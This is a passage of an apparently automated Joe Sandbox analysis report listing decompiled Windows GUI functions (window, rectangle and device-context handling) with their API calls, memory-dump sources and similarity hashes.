                                            				struct HBRUSH__* _t60;
                                            				long _t64;
                                            				struct HBRUSH__* _t66;
                                            				intOrPtr _t70;
                                            				intOrPtr _t72;
                                            
                                            				CopyRect( &_v20, _a8);
                                            				_v20.right = _v20.left + _a12;
                                            				_t46 = _a20;
                                            				if(_t46 != 0) {
                                            					_t46 =  *(_t46 + 4);
                                            				}
                                            				_t72 = _a4;
                                            				FillRect( *(_t72 + 4),  &_v20, _t46);
                                            				_t50 = _a8->right;
                                            				_v20.right = _t50;
                                            				_v20.left = _t50 - _a12;
                                            				_t52 = _a20;
                                            				if(_t52 != 0) {
                                            					_t52 =  *(_t52 + 4);
                                            				}
                                            				FillRect( *(_t72 + 4),  &_v20, _t52);
                                            				CopyRect( &_v20, _a8);
                                            				_t70 = _a16;
                                            				_v20.bottom = _v20.top + _t70;
                                            				_t59 = _a12;
                                            				_v20.left = _v20.left + _t59;
                                            				_v20.right = _v20.right - _t59;
                                            				_t60 = _a20;
                                            				if(_t60 != 0) {
                                            					_t60 =  *(_t60 + 4);
                                            				}
                                            				FillRect( *(_t72 + 4),  &_v20, _t60);
                                            				_t64 = _a8->bottom;
                                            				_v20.bottom = _t64;
                                            				_v20.top = _t64 - _t70;
                                            				_t66 = _a20;
                                            				if(_t66 != 0) {
                                            					_t66 =  *(_t66 + 4);
                                            				}
                                            				return FillRect( *(_t72 + 4),  &_v20, _t66);
                                            			}














                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$Fill$Copy
                                            • String ID:
                                            • API String ID: 4194453840-0
                                            • Opcode ID: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
                                            • Instruction ID: dd711018ace7994bf7c1ba7351bcb303de77ebc25f490cf6722cdbc4bd81ee43
                                            • Opcode Fuzzy Hash: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
                                            • Instruction Fuzzy Hash: EB319A75A0011AAFCF00DFA9CD85DAEBBF8FF08354B488566B914D7211D730EA14DBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0041CD49(void* __ecx, void* __eflags) {
                                            				void* _t57;
                                            				void* _t75;
                                            				void* _t77;
                                            
                                            				E00406520(E0042A90C, _t77);
                                            				_t75 = __ecx;
                                            				_push(__ecx);
                                            				E0041A41D(_t77 - 0x40, __eflags);
                                            				 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
                                            				GetClientRect( *(__ecx + 0x1c), _t77 - 0x2c);
                                            				GetWindowRect( *(_t75 + 0x1c), _t77 - 0x1c);
                                            				E0041A2F1(_t75, _t77 - 0x1c);
                                            				OffsetRect(_t77 - 0x2c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
                                            				E0041A13B(_t77 - 0x40, _t77 - 0x2c);
                                            				OffsetRect(_t77 - 0x1c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
                                            				E0041F306(_t75, _t77 - 0x40, _t77 - 0x1c);
                                            				E0041A17D(_t77 - 0x40, _t77 - 0x1c);
                                            				SendMessageA( *(_t75 + 0x1c), 0x14,  *(_t77 - 0x3c), 0);
                                            				E0041F4B4(_t75, _t77 - 0x40, _t77 - 0x1c);
                                            				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
                                            				_t57 = E0041A48F(_t77 - 0x40);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
                                            				return _t57;
                                            			}







                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0041EE8E
                                              • Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
                                              • Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B
                                            • GetClientRect.USER32 ref: 0041EEAE
                                            • GetWindowRect.USER32 ref: 0041EEBB
                                              • Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
                                              • Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E
                                            • OffsetRect.USER32(?,?,?), ref: 0041EEE2
                                              • Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A160
                                              • Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A175
                                            • OffsetRect.USER32(?,?,?), ref: 0041EF00
                                              • Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1A2
                                              • Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1B7
                                            • SendMessageA.USER32(?,00000014,?,00000000), ref: 0041EF27
                                              • Part of subcall function 0041A48F: __EH_prolog.LIBCMT ref: 0041A494
                                              • Part of subcall function 0041A48F: ReleaseDC.USER32 ref: 0041A4B3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$Clip$ClientH_prolog$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                                            • String ID:
                                            • API String ID: 2727942566-0
                                            • Opcode ID: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
                                            • Instruction ID: 5eac70104d705e6b181efe7a53c40368cdb347892f906ea361a41ca3bb60cced
                                            • Opcode Fuzzy Hash: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
                                            • Instruction Fuzzy Hash: 0721DBB1D0011EABCF15EBA5DC49DEEB77CEB44314F00412AE512E3191DB78A94ACB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E0041BDC7(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
                                            				void* _v8;
                                            				intOrPtr _v16;
                                            				char _v20;
                                            				struct tagRECT _v36;
                                            				struct HDC__* _v48;
                                            				struct HDC__* _v52;
                                            				char _v56;
                                            				struct tagTEXTMETRICA _v112;
                                            				void* __ebp;
                                            				void* _t28;
                                            				int _t38;
                                            				intOrPtr* _t43;
                                            				intOrPtr _t55;
                                            				intOrPtr* _t56;
                                            				intOrPtr _t57;
                                            
                                            				_t56 = __ecx;
                                            				_push(0);
                                            				E0041A369( &_v56, __eflags);
                                            				_t28 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
                                            				_v8 = 0;
                                            				if(_t28 != 0) {
                                            					_v8 = SelectObject(_v52, _t28);
                                            				}
                                            				GetTextMetricsA(_v48,  &_v112);
                                            				_t63 = _v8;
                                            				if(_v8 != 0) {
                                            					SelectObject(_v52, _v8);
                                            				}
                                            				E0041A3DB( &_v56);
                                            				SetRectEmpty( &_v36);
                                            				E00424F9B(_t56, _t63,  &_v36, _a12);
                                            				 *((intOrPtr*)( *_t56 + 0xa0))(0x407, 0,  &_v20);
                                            				_t38 = GetSystemMetrics(6);
                                            				_t57 =  *((intOrPtr*)(_t56 + 0x78));
                                            				_t55 = (_t38 + _v16 << 1) - _v36.bottom - _v36.top - _v112.tmInternalLeading + _v112.tmHeight - 1;
                                            				if(_t55 < _t57) {
                                            					_t55 = _t57;
                                            				}
                                            				_t43 = _a4;
                                            				 *_t43 = 0x7fff;
                                            				 *((intOrPtr*)(_t43 + 4)) = _t55;
                                            				return _t43;
                                            			}



















                                            APIs
                                              • Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
                                              • Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397
                                            • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041BDE4
                                            • SelectObject.GDI32(?,00000000), ref: 0041BDFB
                                            • GetTextMetricsA.GDI32(?,?), ref: 0041BE07
                                            • SelectObject.GDI32(?,?), ref: 0041BE18
                                            • SetRectEmpty.USER32(?), ref: 0041BE26
                                            • GetSystemMetrics.USER32 ref: 0041BE5B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MetricsObjectSelect$EmptyH_prologMessageRectSendSystemText
                                            • String ID:
                                            • API String ID: 1789613188-0
                                            • Opcode ID: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
                                            • Instruction ID: 4a213af7df46fba370d1b0da78e664596150d00b2e67ee82928ccd15ad32fd7f
                                            • Opcode Fuzzy Hash: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
                                            • Instruction Fuzzy Hash: 5E214C72A00219EFCF00DFA4DC88CEEBBBAFF48304B54402AE502A7250DB346E51CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041BBD7(struct HWND__* _a4, struct HWND__** _a8) {
                                            				struct HWND__* _t6;
                                            				void* _t12;
                                            				struct HWND__** _t14;
                                            				struct HWND__* _t15;
                                            				struct HWND__* _t16;
                                            				struct HWND__* _t17;
                                            
                                            				_t17 = _a4;
                                            				_t16 = _t17;
                                            				if(_t17 != 0) {
                                            					L16:
                                            					if((GetWindowLongA(_t16, 0xfffffff0) & 0x40000000) == 0) {
                                            						L4:
                                            						_t15 = _t16;
                                            						_t6 = _t16;
                                            						if(_t16 == 0) {
                                            							L6:
                                            							if(_t17 == 0 && _t16 != 0) {
                                            								_t16 = GetLastActivePopup(_t16);
                                            							}
                                            							_t14 = _a8;
                                            							if(_t14 != 0) {
                                            								if(_t15 == 0 || IsWindowEnabled(_t15) == 0 || _t15 == _t16) {
                                            									 *_t14 =  *_t14 & 0x00000000;
                                            								} else {
                                            									 *_t14 = _t15;
                                            									EnableWindow(_t15, 0);
                                            								}
                                            							}
                                            							return _t16;
                                            						} else {
                                            							goto L5;
                                            						}
                                            						do {
                                            							L5:
                                            							_t15 = _t6;
                                            							_t6 = GetParent(_t6);
                                            						} while (_t6 != 0);
                                            						goto L6;
                                            					}
                                            					_t16 = GetParent(_t16);
                                            					L15:
                                            					if(_t16 == 0) {
                                            						goto L4;
                                            					}
                                            					goto L16;
                                            				}
                                            				_t12 = E0041BC73();
                                            				if(_t12 != 0) {
                                            					L14:
                                            					_t16 =  *(_t12 + 0x1c);
                                            					goto L15;
                                            				}
                                            				_t12 = E00404DAE();
                                            				if(_t12 != 0) {
                                            					goto L14;
                                            				}
                                            				_t16 = 0;
                                            				goto L4;
                                            			}










                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                            • String ID:
                                            • API String ID: 670545878-0
                                            • Opcode ID: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
                                            • Instruction ID: 79cfeeef415f6b616a2a8b62cc4a1a68cb8ced5d87a6c48b433ad5091e6d0582
                                            • Opcode Fuzzy Hash: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
                                            • Instruction Fuzzy Hash: 5F119E327012216B86312A6A9C84BABB398DF94B54F09052FEC00E7314FF28DC8242ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E00420A8B(intOrPtr _a4) {
                                            				intOrPtr _v4;
                                            				struct HWND__* _t15;
                                            				struct HWND__* _t17;
                                            				signed int _t21;
                                            				intOrPtr _t28;
                                            				void* _t30;
                                            				struct HWND__* _t32;
                                            
                                            				_v4 = _t28;
                                            				_t15 = GetWindow(GetDesktopWindow(), 5);
                                            				_t32 = _t15;
                                            				if(_t32 == 0) {
                                            					return _t15;
                                            				} else {
                                            					while(1) {
                                            						_push(_t32);
                                            						_t30 = E00413767();
                                            						if(_t30 != 0) {
                                            							_t19 =  *((intOrPtr*)(_v4 + 0x1c));
                                            							if( *((intOrPtr*)(_v4 + 0x1c)) != _t32 && E004208E0(_t19, _t32) != 0) {
                                            								_t21 = GetWindowLongA(_t32, 0xfffffff0);
                                            								if(_a4 != 0) {
                                            									if((_t21 & 0x18000000) == 0 && ( *(_t30 + 0x24) & 0x00000002) != 0) {
                                            										ShowWindow(_t32, 4);
                                            										 *(_t30 + 0x24) =  *(_t30 + 0x24) & 0xfffffffd;
                                            									}
                                            								} else {
                                            									if((_t21 & 0x18000000) == 0x10000000) {
                                            										ShowWindow(_t32, 0);
                                            										 *(_t30 + 0x24) =  *(_t30 + 0x24) | 0x00000002;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						_t17 = GetWindow(_t32, 2);
                                            						_t32 = _t17;
                                            						if(_t32 == 0) {
                                            							return _t17;
                                            						}
                                            					}
                                            				}
                                            			}











                                            APIs
                                            • GetDesktopWindow.USER32 ref: 00420A94
                                            • GetWindow.USER32(00000000), ref: 00420AA1
                                            • GetWindowLongA.USER32 ref: 00420AD6
                                            • ShowWindow.USER32(00000000,00000000), ref: 00420AF2
                                            • ShowWindow.USER32(00000000,00000004), ref: 00420B0A
                                            • GetWindow.USER32(00000000,00000002), ref: 00420B13
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$Show$DesktopLong
                                            • String ID:
                                            • API String ID: 3178490500-0
                                            • Opcode ID: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
                                            • Instruction ID: 7b09bf3e44239edb134f584a809b554a06cce84e6abb4a59c0b4e2be1682ca92
                                            • Opcode Fuzzy Hash: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
                                            • Instruction Fuzzy Hash: 5F11C27170173926D2319664AC49F1FBBDC9F51768FD00616FA10A3286DBACE84186AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E0042986F(void* __ecx) {
                                            				int _v8;
                                            				char _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				int _t14;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);
                                            				_v12 = GetDeviceCaps( *(__ecx + 8), 8);
                                            				_v8 = _t14;
                                            				E004298F1(__ecx,  &_v12);
                                            				SetMapMode( *(__ecx + 4), 1);
                                            				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);
                                            				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);
                                            				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);
                                            				return E004296EA(_t14, __ecx, 0, 0);
                                            			}









                                            APIs
                                            • GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
                                            • GetDeviceCaps.GDI32(?,00000008), ref: 0042988D
                                              • Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
                                              • Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F
                                            • SetMapMode.GDI32(?,00000001), ref: 004298A5
                                            • SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
                                            • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
                                            • IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE
                                              • Part of subcall function 004296EA: GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
                                              • Part of subcall function 004296EA: GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
                                              • Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,00000058), ref: 00429779
                                              • Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
                                              • Part of subcall function 004296EA: SetMapMode.GDI32(00000000,00000008), ref: 004297BC
                                              • Part of subcall function 004296EA: SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
                                              • Part of subcall function 004296EA: SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
                                            • String ID:
                                            • API String ID: 1729379761-0
                                            • Opcode ID: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
                                            • Instruction ID: ffdc988b3e99ab10a3d87d522c915a36f24d74d83ef75783a8118d4b02154ef1
                                            • Opcode Fuzzy Hash: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
                                            • Instruction Fuzzy Hash: 10012D31600204BFDB315B56DC4AD5BBFB9EF89B20B40462DF166921A0DB71AD11DB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 40%
                                            			E004215FF(void* __ecx, struct HWND__* _a4, intOrPtr _a8) {
                                            				void* _v8;
                                            				char _v12;
                                            				char _v532;
                                            				void* __ebp;
                                            				long _t19;
                                            				void* _t23;
                                            				void* _t27;
                                            
                                            				_push( &_v8);
                                            				_push( &_v12);
                                            				_push(_a8);
                                            				_t27 = __ecx;
                                            				_push(0x3e8);
                                            				L0040C37C();
                                            				lstrcpynA( &_v532, GlobalLock(_v8), 0x208);
                                            				_t19 = GlobalUnlock(_v8);
                                            				_push(_v8);
                                            				_push(0x8000);
                                            				_push(0x3e4);
                                            				_push(0x3e8);
                                            				_push(_a8);
                                            				L0040C376();
                                            				PostMessageA(_a4, 0x3e4,  *(_t27 + 0x1c), _t19);
                                            				if(E004166B3(_t27) != 0) {
                                            					_t23 = E00424BFB();
                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t23 + 4)))) + 0x94))( &_v532);
                                            				}
                                            				return 0;
                                            			}











                                            APIs
                                            • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0042161E
                                            • GlobalLock.KERNEL32 ref: 00421626
                                            • lstrcpynA.KERNEL32(?,00000000,00000208), ref: 00421639
                                            • GlobalUnlock.KERNEL32(?), ref: 00421642
                                            • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0042165A
                                            • PostMessageA.USER32 ref: 00421667
                                              • Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
                                            • String ID:
                                            • API String ID: 2333435275-0
                                            • Opcode ID: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
                                            • Instruction ID: 4c25832e6e6faa34b872796a1f01560d3fa617591b77e043d0f58556844ee018
                                            • Opcode Fuzzy Hash: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
                                            • Instruction Fuzzy Hash: 86018436600108FFDB11ABA1DC89EDF7BBDEF58304F004175B909E6161DB349E559BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A8B4(struct HWND__* _a4) {
                                            				struct HWND__* _t3;
                                            				struct HWND__* _t7;
                                            				struct HWND__* _t9;
                                            				struct HWND__* _t11;
                                            
                                            				_t3 = GetFocus();
                                            				_t11 = _t3;
                                            				if(_t11 != 0) {
                                            					_t9 = _a4;
                                            					if(_t11 != _t9) {
                                            						if(E0041A759(_t11, 3) != 0) {
                                            							L5:
                                            							if(_t9 == 0 || (GetWindowLongA(_t9, 0xfffffff0) & 0x40000000) == 0) {
                                            								L8:
                                            								return SendMessageA(_t11, 0x14f, 0, 0);
                                            							}
                                            							_t7 = GetParent(_t9);
                                            							_t3 = GetDesktopWindow();
                                            							if(_t7 != _t3) {
                                            								goto L8;
                                            							}
                                            						} else {
                                            							_t3 = GetParent(_t11);
                                            							_t11 = _t3;
                                            							if(_t11 != _t9) {
                                            								_t3 = E0041A759(_t11, 2);
                                            								if(_t3 != 0) {
                                            									goto L5;
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t3;
                                            			}








                                            APIs
                                            • GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7
                                              • Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A
                                            • GetParent.USER32(00000000), ref: 0041A8DE
                                              • Part of subcall function 0041A759: GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
                                              • Part of subcall function 0041A759: lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794
                                            • GetWindowLongA.USER32 ref: 0041A8F9
                                            • GetParent.USER32(?), ref: 0041A907
                                            • GetDesktopWindow.USER32 ref: 0041A90B
                                            • SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041A91F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                            • String ID:
                                            • API String ID: 2818563221-0
                                            • Opcode ID: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
                                            • Instruction ID: 0ef3fffee83f5250149677f0c627e80be30cc9893a9c62ed2a9ad1800b3459ea
                                            • Opcode Fuzzy Hash: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
                                            • Instruction Fuzzy Hash: 27F0F9712022212AD23127355C4CBEF53689F86B58F5A0527F411E62D0EB1CDDD241AE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 42%
                                            			E0041A7CE(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                            				struct tagRECT _v20;
                                            				struct HWND__* _t22;
                                            
                                            				ClientToScreen(_a4,  &_a8);
                                            				_push(5);
                                            				_push(_a4);
                                            				while(1) {
                                            					_t22 = GetWindow();
                                            					if(_t22 == 0) {
                                            						break;
                                            					}
                                            					if(GetDlgCtrlID(_t22) == 0xffff || (GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) == 0) {
                                            						L5:
                                            						_push(2);
                                            						_push(_t22);
                                            						continue;
                                            					} else {
                                            						GetWindowRect(_t22,  &_v20);
                                            						_push(_a12);
                                            						if(PtInRect( &_v20, _a8) != 0) {
                                            							return _t22;
                                            						}
                                            						goto L5;
                                            					}
                                            				}
                                            				return 0;
                                            			}






                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                            • String ID:
                                            • API String ID: 1315500227-0
                                            • Opcode ID: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
                                            • Instruction ID: 073ddf0fe74a93c2ca18b2cdbf6cccc684bfe4d9908968ef648256188d18c8f8
                                            • Opcode Fuzzy Hash: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
                                            • Instruction Fuzzy Hash: AE017C31201119BBDB21AB649C08EEF776CEF54710F804531F911D51A0E734D963CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E0040A586() {
                                            				int _v8;
                                            				char* _v12;
                                            				void* __ecx;
                                            				char* _t18;
                                            				intOrPtr _t19;
                                            				intOrPtr _t23;
                                            				char* _t27;
                                            				char _t29;
                                            				char _t30;
                                            				signed int _t32;
                                            				char _t34;
                                            				void* _t35;
                                            				char _t36;
                                            				void* _t37;
                                            				signed int _t39;
                                            				signed int _t40;
                                            				char* _t43;
                                            				char* _t46;
                                            				intOrPtr _t47;
                                            				void* _t56;
                                            				signed int _t60;
                                            				signed int _t63;
                                            				signed int _t65;
                                            				signed int _t67;
                                            				intOrPtr _t68;
                                            				void* _t69;
                                            				void* _t70;
                                            				char* _t74;
                                            				char* _t76;
                                            				signed int** _t80;
                                            				intOrPtr _t86;
                                            				intOrPtr _t88;
                                            
                                            				_push(_t55);
                                            				_t70 = 0xc;
                                            				_v12 = 0;
                                            				E004079D4(_t70);
                                            				 *0x4373d8 =  *0x4373d8 | 0xffffffff;
                                            				 *0x4373c8 =  *0x4373c8 | 0xffffffff;
                                            				 *0x439f08 = 0;
                                            				 *_t80 = 0x42f6a8;
                                            				_t74 = E0040B475();
                                            				_t56 = _t69;
                                            				if(_t74 != 0) {
                                            					if( *_t74 == 0) {
                                            						L41:
                                            						_t18 = E00407A35(_t70);
                                            					} else {
                                            						_t19 =  *0x439fbc; // 0x0
                                            						if(_t19 == 0) {
                                            							L18:
                                            							E004062E0( *0x439fbc);
